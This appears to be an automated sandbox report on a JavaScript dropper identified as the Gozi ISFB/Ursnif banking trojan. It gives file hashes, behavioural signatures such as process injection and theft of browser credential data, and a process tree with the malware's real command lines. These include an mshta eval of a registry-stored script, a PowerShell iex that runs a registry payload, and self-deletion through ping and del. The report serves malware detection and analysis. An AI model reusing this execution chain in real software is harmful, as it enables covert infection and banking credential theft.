Overview

overview

10

Static

static

look_prese...s4u.js

windows7_x64

10

look_prese...s4u.js

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    144s
  • platform
    windows10_x64
  • resource
    win10v200410
  • submitted
    17-04-2020 22:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    look_presentation_s4u.js

  • Size

    1.4MB

  • MD5

    a7f767779dd68f33392a2162ff9392d6

  • SHA1

    4c78f182d039cdf20c8d569ff6f6410d0bca7c50

  • SHA256

    44f7552b9707171e3b0e9f7ce8fbca5aee06ad5e47787cbaf5c8ec78134db687

  • SHA512

    f2bb65dcad91a71f9b7a0ecc1db59ed19024549b279546c384b266a0ad430a2b9697e3aaf6a38e511eb4fc32ab1c7fafa8df657fdb352339d6b597e04cffc0e7

Score
10/10
bankertrojangozi_ifsbursnifspyware

Malware Config

Signatures

  • Runs ping.exe 1 TTPs 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 1353 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Makes http(s) request 13 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Gozi, Gozi IFSB

    Gozi ISFB is a well-known and widely distributed banking trojan.

    bankertrojangozi_ifsb
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Ursnif, Dreambot

    Ursnif is a variant of the Gozi IFSB with more capabilities.

    bankertrojanursnif
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Checks whether UAC is enabled 3 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3000
    • C:\Windows\system32\wscript.exe
      wscript.exe C:\Users\Admin\AppData\Local\Temp\look_presentation_s4u.js
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4048
      • C:\Windows\System32\regsvr32.exe
        "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Local\Temp\\CfYvRlk.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3332
        • C:\Windows\SysWOW64\regsvr32.exe
          C:\Users\Admin\AppData\Local\Temp\\CfYvRlk.txt
          4⤵
          • Loads dropped DLL
          PID:1008
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" "about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\786D016B-7752-6A8D-C12C-9B3E8520FF52\\Apdsprov'));if(!window.flag)close()</script>"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\786D016B-7752-6A8D-C12C-9B3E8520FF52").Assioker))
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3960
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2yyqtmrn\2yyqtmrn.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:728
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9258.tmp" "c:\Users\Admin\AppData\Local\Temp\2yyqtmrn\CSCEFED1925FAF433992DCDADCB6E2864A.TMP"
            5⤵
              PID:1060
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qtzxe2nb\qtzxe2nb.cmdline"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1196
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES93BF.tmp" "c:\Users\Admin\AppData\Local\Temp\qtzxe2nb\CSC6494DC7F6CF49C2A4826CCD948F9A41.TMP"
              5⤵
                PID:1336
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\CfYvRlk.txt"
          2⤵
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1828
          • C:\Windows\system32\PING.EXE
            ping localhost -n 5
            3⤵
            • Runs ping.exe
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            PID:2172
        • C:\Windows\system32\cmd.exe
          cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\21A0.bi1"
          2⤵
            PID:3768
            • C:\Windows\system32\nslookup.exe
              nslookup myip.opendns.com resolver1.opendns.com
              3⤵
                PID:4004
            • C:\Windows\system32\cmd.exe
              cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\2140.bi1"
              2⤵
                PID:3680
                • C:\Windows\system32\nslookup.exe
                  nslookup myip.opendns.com resolver1.opendns.com
                  3⤵
                    PID:3536
                • C:\Windows\system32\cmd.exe
                  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2140.bi1"
                  2⤵
                    PID:2996
                  • C:\Windows\system32\cmd.exe
                    cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\21A0.bi1"
                    2⤵
                      PID:4056
                    • C:\Program Files\Windows Mail\WinMail.exe
                      "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                      2⤵
                        PID:3100
                    • C:\Windows\System32\RuntimeBroker.exe
                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                      1⤵
                        PID:3432
                      • C:\Program Files\Internet Explorer\iexplore.exe
                        "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                        1⤵
                        • Suspicious use of FindShellTrayWindow
                        • Modifies Internet Explorer settings
                        • Suspicious use of WriteProcessMemory
                        • Checks whether UAC is enabled
                        • Suspicious use of SetWindowsHookEx
                        PID:3936
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3936 CREDAT:82945 /prefetch:2
                          2⤵
                          • Modifies Internet Explorer settings
                          • Checks whether UAC is enabled
                          • Suspicious use of SetWindowsHookEx
                          PID:3156
                        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3936 CREDAT:82950 /prefetch:2
                          2⤵
                          • Modifies Internet Explorer settings
                          • Checks whether UAC is enabled
                          • Suspicious use of SetWindowsHookEx
                          PID:3448

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/1828-21-0x00000191D2ED0000-0x00000191D2F81000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/1828-17-0x00000191D0BA0000-0x00000191D0BA1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/2172-20-0x000002A02FDA0000-0x000002A02FDA1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3000-19-0x0000000005460000-0x0000000005511000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3000-18-0x0000000002E10000-0x0000000002EC1000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3000-15-0x0000000002E10000-0x0000000002EC1000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3000-12-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3000-36-0x0000000005580000-0x0000000005631000-memory.dmp

                        Filesize

                        708KB

                        Download

                      • memory/3100-35-0x0000014878410000-0x0000014878411000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3432-14-0x000001FD062F0000-0x000001FD062F1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3936-16-0x00000279F8A70000-0x00000279F8A71000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/3960-13-0x000001A348870000-0x000001A348921000-memory.dmp

                        Filesize

                        708KB

                        Download